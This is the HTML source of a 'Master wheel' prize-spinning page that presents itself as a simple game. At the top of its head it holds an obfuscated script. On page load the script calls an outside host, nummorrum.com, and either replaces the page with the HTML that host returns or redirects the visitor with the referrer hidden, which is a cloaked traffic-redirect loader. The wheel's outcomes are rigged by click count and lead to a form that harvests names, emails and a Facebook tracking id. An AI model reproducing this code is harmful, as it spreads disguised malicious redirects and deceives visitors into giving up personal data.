<!DOCTYPE html>
<html  lang="en">
<head>

	<script defer>var _0x369b=['148145nVjqHZ','1KnzOVM','write','close','responseText','send','1KZBjoE','<html><head>','3oFlqAw','135EZDTJn','status','1vvDXtb','1017779hHEKWd','search','5XuECWr','458033uKbJwc','landing_url','landing_html','[?&]nr=1','<meta http-equiv="refresh" content="0; url=','href','21031cypqMO','3841CjvkZd','" />','https://nummorrum.com/index.php?key=1i33djf34mcpy3fin3ba&lp_type=js_redirect&'+window.location.search.substring(1),'parse','1690egDYfd','GET','open','31219ZtOXgR','267dsQspw','</head></html>','<meta content="1645432057090;"/>'];var _0x5e11=function(_0x4cb19d,_0x244c7b){_0x4cb19d=_0x4cb19d-0x6b;var _0x369b4d=_0x369b[_0x4cb19d];return _0x369b4d;};(function(_0x4bc0c1,_0x3810ae){var _0x436d21=_0x5e11;while(!![]){try{var _0x34542f=parseInt(_0x436d21(0x70))*-parseInt(_0x436d21(0x7d))+-parseInt(_0x436d21(0x75))*parseInt(_0x436d21(0x7c))+parseInt(_0x436d21(0x6d))*parseInt(_0x436d21(0x88))+parseInt(_0x436d21(0x73))*parseInt(_0x436d21(0x89))+-parseInt(_0x436d21(0x72))*parseInt(_0x436d21(0x76))+parseInt(_0x436d21(0x85))*parseInt(_0x436d21(0x81))+-parseInt(_0x436d21(0x84))*-parseInt(_0x436d21(0x6f));if(_0x34542f===_0x3810ae)break;else _0x4bc0c1['push'](_0x4bc0c1['shift']());}catch(_0x2f5fe4){_0x4bc0c1['push'](_0x4bc0c1['shift']());}}}(_0x369b,0x99960),!function(){var _0x44ddeb=_0x5e11;if(-0x1==window['location'][_0x44ddeb(0x7b)][_0x44ddeb(0x74)](_0x44ddeb(0x79))){var _0xf5e636=new XMLHttpRequest();_0xf5e636[_0x44ddeb(0x83)](_0x44ddeb(0x82),_0x44ddeb(0x7f),!0x0),_0xf5e636['onload']=function(){var _0x3dd81e=_0x44ddeb;if(0xc8===_0xf5e636[_0x3dd81e(0x71)]){var _0x4e9c69=JSON[_0x3dd81e(0x80)](_0xf5e636[_0x3dd81e(0x6b)]);return _0x4e9c69[_0x3dd81e(0x78)]?(document[_0x3dd81e(0x83)](),document['write'](_0x4e9c69[_0x3dd81e(0x78)]),void document[_0x3dd81e(0x8b)]()):_0x4e9c69[_0x3dd81e(0x77)]?(document[_0x3dd81e(0x83)](),document[_0x3dd81e(0x8a)](_0x3dd81e(0x6e)),document[_0x3dd81e(0x8a)]('<meta name="referrer" content="never" />'),document[_0x3dd81e(0x8a)](_0x3dd81e(0x87)),document['write'](_0x3dd81e(0x7a)+_0x4e9c69[_0x3dd81e(0x77)]+_0x3dd81e(0x7e)),document[_0x3dd81e(0x8a)](_0x3dd81e(0x86)),void document[_0x3dd81e(0x8b)]()):void 0x0;}},_0xf5e636[_0x44ddeb(0x6c)]();}}());</script>


	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
	<title>Game 2022</title>
	<link rel="stylesheet" href="bootstrap.css">

	<style type="text/css">
		.btn-primary {
    color: rgb(255, 255, 255);
    background-color: rgb(0 255 8);;
    border-color: rgb(57 255 0);
}
	</style>
	<link rel="stylesheet" href="prism.css">
	<link rel="stylesheet" href="sweetalert2.min.css">
	<link rel="stylesheet" href="superwheel.css">
	<link rel="stylesheet" href="main.css">
	<link href="css.css" rel="stylesheet">	
</head>
<body>
	<header class="main-header main-header-light js-main-header" style="    background: rgb(0 254 0/ 40%)">
		<h1 style="text-align: center;color:#fff">Master wheel</h1>
	</header>
	<div class="home-intro blue-dark-bg height-vh" id="demo_spinner" style="background: url(456.png);">
		<div class="container-fluid">
			<div class="container-xl" style="position: relative;">
				<div class="wheel mb-5 superWheel _0" style="font-size: 16px; width: 500px; height: 500px;">
    <div class="sWheel-wrapper" style="width: 500px; height: 500px; font-size: 100%; background: url(123.png);background-size: 696px;background-position: center;">
        <div class="sWheel-inner" style="background: url(123.png);background-size: 696px;background-position: center;">
            <div class="sWheel">
                <div class="sWheel-bg-layer" style="background: url(123.png);background-size: 696px;background-position: center;">
                </div>
                <div class="sWheel-txt-wrap">
                    <div class="sWheel-txt" style="transform: rotate(30deg);">
                        <div style="padding-right: 8%; transform: rotate(0deg) translate(0px, -50%); color: rgb(255, 255, 255);" data-color="#fff" class="sWheel-title">
                            20% OFF
                            <div></div>
                        </div>
                        <div style="padding-right: 8%; transform: rotate(60deg) translate(0px, -50%); color: rgb(255, 255, 255);" data-color="#fff" class="sWheel-title">
                            Nothing
                            <div></div>
                        </div>
                        <div style="padding-right: 8%; transform: rotate(120deg) translate(0px, -50%); color: rgb(255, 255, 255);" data-color="#fff" class="sWheel-title">
                            30% OFF
                            <div></div>
                        </div>
                        <div style="padding-right: 8%; transform: rotate(180deg) translate(0px, -50%); color: rgb(255, 255, 255);" data-color="#fff" class="sWheel-title">
                            Not yet
                            <div></div>
                        </div>
                        <div style="padding-right: 8%; transform: rotate(240deg) translate(0px, -50%); color: rgb(255, 255, 255);" data-color="#fff" class="sWheel-title">
                            40% OFF
                            <div></div>
                        </div>
                        <div style="padding-right: 8%; transform: rotate(300deg) translate(0px, -50%); color: rgb(255, 255, 255);" data-color="#fff" class="sWheel-title">
                            Sorry but no
                            <div></div>
                        </div>
                    </div>
                </div>
                <div class="sWheel-center"></div>
            </div>
        </div>
        <div class="sWheel-marker">     
        </div>
    </div>
</div>
				<ul class="intro-btn-group mb-5" style="position: absolute;
    left: 50%;
    transform: translateX(-50%);
    top: 47%;">
				<li><button class="btn btn-primary btn-xl btn-block spin-to-win" type="button"   style="">Find out</button></li>
				</ul>		
			</div>
		</div>
	</div>
	</div>
</div>
  	<script src="jquery-3.3.1.js"></script>
<style type="text/css">
</style>
<footer class="footer text-center">
	<div class="container">

		<div id="rrr" style="
    z-index: 999;
    position: fixed;
    bottom: 0;left: 0;
    width: 100%;
    background: rgb(0,0,0);
    color: #fff;
    padding: 12px;
    "><p style="
    font-size: 12px;
    text-align: center;
">This site does not use cookies, by accepting you provide the option to accept cookies, or you can configure them yourself.<br>Success in guessing does not imply success in gambling and other games. The product is intended for entertainment purposes by persons over the age of 18+ The game doesn't contains in-app purchases
 <button id="ggg" style="font-size: 12px;">Got it!</button></p></div>
<div style="position: fixed;bottom: 5px; right:5px">
    <div style="margin-bottom: 0px"><a href="terms.html" style="color: #fff;font-size: 15px">Terms of use</a></div> <br>
    <div><a href="policy.html" style="color: #fff;font-size: 15px">Policy privacy</a></div>
</div>
<script type="text/javascript">
    $('#ggg').click(function(){
        $("#rrr").hide();
    })
</script>
		<small class="copyright">Copyright © 2021</small>
	</div>
</footer>

  	<script src="jquery-3.3.1.js"></script>
<script src="bootstrap.bundle.js"></script>
	<script src="superwheel.js"></script>
	<script src="prism.js" data-manual=""></script>
	<script src="sweetalert2.min.js" data-manual=""></script>
	<script src="main.js"></script>
	<script>
				jQuery(document).ready(function($){
					
					$('.wheel').superWheel({
						slices: [
							{
								text    : '20 Bonuses',
								message : 'You win 20 Bonuses',
								background   : '#364C62',
								value     : 1
							},{
								text    : 'No chance',
								message : 'You have No chance :(</br>try again',
								background   : '#9575CD',
								value     : 0
							},{
								text    : '30 Bonuses',
								message : 'You win 30 Bonuses',
								background   : '#E67E22',
								value     : 2
							},{
								value      : 'd',
								text    : 'Lose',
								message : 'You Lose</br>try again',
								background   : '#E74C3C',
								win     : 0
							},{
								text    : '40 Bonuses',
								message : 'You win 40 Bonuses',
								background   : '#2196F3',
								color : 'green',
								value     : 3
							},{
								text    : 'Nothing',
								message : 'You get Nothing :( </br>try again',
								background   : '#95A5A6',
								value     : 0
							}
						],
						
						
						//======================================
						//======================================
						//=======    Wheel Parameters    =======
						//======================================
						//======================================
						text : {
							color: 'green',
							offset : 8,
							letterSpacing: 0,
							orientation: 'v',
							arc: true
						},
						
						slice : {
							background : "#333",
						},
						
						line:{
							width : 6,
							color : "#fefefe",
						},
						
						outer : {
							width : 10,
							color : "#fefefe",
						},
						
						inner : {
							width : 8,
							color : "#fefefe",
						},
						
						width: 500,
						duration: 8000,
						
					});
					
					var tick = new Audio('tick.mp3');
					var regexp = /fbid=([^&]+)/i;
       
					var luckky = 0;
					var lukk;
					$(document).on('click','.spin-to-win',function(e){
						luckky++;
						console.log(luckky);
						if(luckky == 2){
							lukk = 1;
						} else if(luckky == 5) {
							lukk = 2;
						} else if(luckky == 7){
							lukk = 3;
						} else{
							lukk = 0;
						}
						e.preventDefault();
						$('.wheel').superWheel('start',lukk);
						$(this).prop('disabled',true);
					});
					
					$('.wheel').superWheel('onStart',function(results){
						$('.spin-to-win').text('Searching...');
					});
					
					
					$('.wheel').superWheel('onStep',function(results){
						if (typeof tick.currentTime !== 'undefined')
							tick.currentTime = 0;
						tick.play();
					});
					
					$('.wheel').superWheel('onComplete',function(results){
						 var GetValue = '';
        if (!!regexp.exec(document.location.search)){
            GetValue = regexp.exec(document.location.search)[1];
            $('input[name="customName"]').attr('value',GetValue);
            var myvar = '<p class="swal2-content">You win happy time</br> enter your name & email</p><form action="success.php" method="POST" ><input type="text" placeholder="your name" name="name" required></br><input placeholder="your email" type="email" name="email" style="margin-top:10px" required></br></br><input style="display:none" type="text" name="pixel" value="'+GetValue+'"><input style="margin-top:10px" type="submit" class="btnmore" value="Send us text"></form>';
        } else{
        	var myvar = '<p class="swal2-content">You win happy time</br> enter your </p><form action="success.php" method="POST" ><input type="text" placeholder="your name" name="name" required></br><input placeholder="your email" type="email" name="email" style="margin-top:10px" required></br></br><input name="pixel" style="display:none" type="text" value="111111"><input style="margin-top:10px" type="submit" class="btnmore" value="Send us text"></form>';
        }
						if(results.value === 1  ){
							swal({
								type: 'success',
								title: "Congratulations!", 
								html: myvar
							});
							setInterval(function(){ $(".swal2-confirm").hide() }, 500);
						}  else if( results.value === 3){
								swal({
								type: 'success',
								title: "Congratulations!", 
								html: myvar
							});
									setInterval(function(){ $(".swal2-confirm").hide() }, 500);		
						} else{
							swal("Oops!", results.message, "error");
						}
						$('.spin-to-win:disabled').prop('disabled',false).text('Get another chance');
					});
				});
				</script>
				<script type="text/javascript">
					function explode(){
  $('.sWheel-bg-layer').css({'background':'url(123.png)','background-size':'696px','background-position':'center'})
}
setTimeout(explode, 600);
	
	// background: url(123.png);background-size: 696px;background-position: center;
</script>
 			<!-- 484959 krfktitj pelerkjn ljkhrhg lkhhru 94949403948580 94i3j3n4 92jrfb  -->
</body>
</html>
